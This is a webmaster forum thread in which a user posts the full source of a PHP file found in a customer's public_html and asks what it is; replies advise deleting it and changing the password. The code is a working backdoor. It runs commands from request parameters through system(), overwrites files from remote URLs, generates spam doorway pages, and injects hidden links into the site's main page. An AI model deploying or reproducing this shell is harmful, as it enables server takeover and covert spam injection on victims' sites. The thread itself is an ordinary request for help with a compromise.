Unknown Folder

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts
  • CarbonTerry
    Major General

    • Oct 2005
    • 2620

    Unknown Folder

    Hello,
    I have found an unknown folder (zjfem) in a customers public_html.
    here's the code contained in a "ubu.php file:
    <?php
    ignore_user_abort(1);
    set_time_limit(0);

    function Clear()
    {
    unlink("c");
    unlink("1r.txt");
    unlink("log");
    }

    function Clear2()
    {
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
    $fin = ereg_replace("<!--dd5-->", "", $fin);
    $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
    }

    function GetVar($name, &$var)
    {
    $var = "";
    if (isset($_POST[$name]))
    $var = $_POST[$name];

    if (isset($_GET[$name]))
    $var = $_GET[$name];

    if (($var) =="")
    return false;
    else return true;
    }


    function GenNew()
    {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
    $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
    $sg = $_GET["sg"];

    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c"))
    {
    $fconf = file("c");
    $tname = trim($fconf[0]);
    }
    else
    {
    $fconf = fopen("c", "w+");
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<5; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $tname = $nm;
    mkdir($tname);
    fwrite($fconf, $tname);
    $pid = 0;
    $fht = fopen("$tname/.htaccess", "w+");

    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);
    }
    $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {

    $fc = "";
    $fp = fopen($gname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);

    $arr = explode("</html>", $fin);
    //print_r($arr);
    $curs = trim($arr[1]);

    $newf = "$tname/$curs/";
    echo "$newf";
    mkdir($newf);
    $fnd = fopen("$tname/$curs/$curs".".htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    fwrite($fr, "$tname/$curs/$curs".".htm\n");


    }

    }

    function Gen2()
    {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    $md = false;
    if (isset($_POST["sg"]))
    $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
    $sg = $_GET["sg"];

    if (isset($_GET["md"]))
    $md = true;

    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c"))
    {
    $fconf = file("c");
    $tname = trim($fconf[0]);
    $i_dor = trim($fconf[1]);
    $i_dor = $i_dor+0;
    }
    else
    {
    $fconf = fopen("c", "w+");
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<5; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $tname = $nm;
    mkdir($tname);
    fwrite($fconf, $tname."\n");
    fwrite($fconf, "0\n");
    $pid = 0;
    $fht = fopen("$tname/.htaccess", "w+");
    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);


    $fht = fopen("$tname/2.js", "w+");
    $htname = $sg."2js.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);



    $f1t = fopen("1t", "w+");
    $f1tname = $sg."1t.php";
    $fp = fopen($f1tname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($f1t, $fin);
    fclose($f1t);


    }
    $i_dor++;
    $i_dor--;
    $a1t = file("1t");
    $gname = $sg."sgen2.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {

    $cth = trim($a1t[$i_dor]);
    $i_dor++;
    $fc = "";
    $fp = fopen($gname."?th=$cth", "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);


    $links ="";
    for ($y=0; $y<30; $y++)
    {
    $ry = mt_rand(0,199);
    $rth = trim($a1t[$ry]);
    $links .= "<a href='$rth.htm'>$rth</a> \n";
    }
    $fin = ereg_replace("<LINKS2>", $links, $fin);

    $curs = $cth;
    $fnd = fopen("$tname/$curs".".htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    if ($md)
    {
    fwrite($fr, "$tname/$curs".".htm\n");
    }
    }
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n".$i_dor."\n");
    fclose($fconf);
    }

    function Gen()
    {
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
    $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
    $sg = $_GET["sg"];

    if (isset($_POST["gm"]))
    $g = $_POST["gm"];

    if (isset($_GET["gm"]))
    $g = $_GET["gm"];


    $path = "";
    $fr = fopen("1r.txt", "a+");
    if (file_exists("c"))
    {
    $fconf = file("c");
    $tname = trim($fconf[0]);
    $cname = trim($fconf[1]);
    $curs = trim($fconf[2]);
    $pid = trim($fconf[3]);
    if ($pid == 100)
    {
    $pid = 0;
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<3; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $cname = $nm;
    mkdir("$tname/$cname");
    $curs = $g;
    }
    }
    else
    {
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<5; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $tname = $nm;
    $pid = 0;
    $curs = $g;
    mkdir($tname);
    $fht = fopen("$tname/.htaccess", "w+");
    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);
    $rnd = mt_rand(0, 999);
    $nm = "";
    for ($i=0; $i<3; $i++)
    {
    $ran = mt_rand(0,26);
    $sym = $alp[$ran];
    $nm = $nm.$sym;
    }
    $cname = $nm;
    mkdir("$tname/$cname");
    }
    $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
    $fp = fopen($gname."?g=$curs", "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);

    $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    }

    if ($j==100)
    {
    $fp = fopen($gname."?g=$curs&m=1", "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);
    $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    $map = "$path/$tname/$cname/$curs"."_lm.htm";
    fwrite($fr,"$map\n");
    }

    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);

    }

    function Update()
    {
    if (isset($_GET["name"]))
    $sname = $_GET["name"];

    $thisname = "$sname.php";
    if (isset($_POST['u']))
    $u = $_POST['u'];

    if (isset($_GET['u']))
    $u = $_GET['u'];

    $fp = fopen($u, "r");
    $fin = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc) break;
    $fin .= $fc;
    }
    fclose($fp);

    $fthis = fopen($thisname, "w+");
    fwrite($fthis, $fin);
    fclose($fthis);
    }

    function Com()
    {
    if (isset($_POST['c']))
    @system($_POST['c']);
    if (isset($_GET['c']))
    @system($_GET['c']);
    }

    function MRepl()
    {
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">";
    $endtag = "</font></body></html><dd5> ";
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
    // удаляем завершающие хтмл теги
    $fin = preg_replace ("/<\/body>/i", "", $fin);
    $fin = preg_replace ("/<\/html>/i", "", $fin);
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
    $drs = '';
    while (!feof($fp))
    {
    $fc = fgets($fp, 1024);
    if (!$fc)
    {
    exit();
    }
    $drs .= $fc;
    }
    fclose($fp);
    $fin = $fin.$begtag;
    $fin = $fin.$drs;
    $fin = $fin.$endtag;
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    }



    function Main()
    {
    if (isset($_POST['u']) || isset($_GET['u']))
    {
    Update();
    exit();
    }



    if (isset($_POST['c']) || isset($_GET['c']))
    {
    Com();
    exit();
    }

    if (isset($_POST['g']) || isset($_GET['g']))
    {
    Gen();
    exit();
    }

    if (isset($_POST['g1']) || isset($_GET['g1']))
    {
    GenNew();
    exit();
    }


    if (isset($_POST['g2']) || isset($_GET['g2']))
    {
    Gen2();
    exit();
    }

    if (isset($_POST['s']) || isset($_GET['s']))
    {
    MRepl();
    exit();
    }

    if (isset($_POST['cl']) || isset($_GET['cl']))
    {
    Clear();
    exit();
    }

    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
    Clear2();
    exit();
    }

    echo "<ok>";

    }

    Main();

    ?>
    I need some help with this one.
    Thanks
    CarbonTerry
    Semper Fi
    Still green...still mean......just not as lean

    Red Hawk Archery
    Zone 5 Photo
    My USMC
  • Marincky
    General

    • Apr 2006
    • 4539

    #2
    Re: Unknown Folder

    Zap it!!
    Don't aim for success if you want it; just do what you love and believe in, and it will come naturally.

    Comment

    • CarbonTerry
      Major General

      • Oct 2005
      • 2620

      #3
      Re: Unknown Folder

      Thanks M
      I will delete it right away. What is it?
      CarbonTerry
      Semper Fi
      Still green...still mean......just not as lean

      Red Hawk Archery
      Zone 5 Photo
      My USMC

      Comment

      • Marincky
        General

        • Apr 2006
        • 4539

        #4
        Re: Unknown Folder

        I can't tell you what it is, but the only folders inside your public_html should be ones you recognise. At the extreme worst, if you delete something you shouldn't, you only have to republish the site. But if it were me I would have zapped it on first glance. Seen another post very similar to this earlier. Get rid.. and possibly even change your password ; - )
        Don't aim for success if you want it; just do what you love and believe in, and it will come naturally.

        Comment

        • CarbonTerry
          Major General

          • Oct 2005
          • 2620

          #5
          Re: Unknown Folder

          password change completed.
          CarbonTerry
          Semper Fi
          Still green...still mean......just not as lean

          Red Hawk Archery
          Zone 5 Photo
          My USMC

          Comment

          Working...
          X